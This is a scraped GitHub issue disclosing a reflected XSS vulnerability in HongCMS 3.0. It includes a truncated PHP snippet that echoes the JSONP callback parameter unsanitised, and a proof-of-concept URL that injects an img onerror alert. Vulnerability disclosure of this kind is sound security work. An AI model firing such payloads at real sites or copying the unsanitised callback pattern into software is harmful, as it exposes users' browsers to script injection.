HongCMS HongCMS 3.0 - XSS vulnerability

HongCMS 3.0 - XSS vulnerability

Open iv3n0m opened this issue 5 years ago • 0 comments

Vulnerability location

test

'); if($function){ echo $function . '(' . $this->json->encode($arr) . ')'; //jsonp返回数据的格式 }else{ echo $this->json->encode($arr); //json返回数据的格式 } } } ?>

POC：ajax/myshop?callback=%3Cimg%20src=1%20onerror=alert(1)%20/%3E

Dec 25 '19 07:12 iv3n0m

HongCMS HongCMS copied to clipboard

HongCMS 3.0 - XSS vulnerability

Vulnerability location

HongCMS
HongCMS copied to clipboard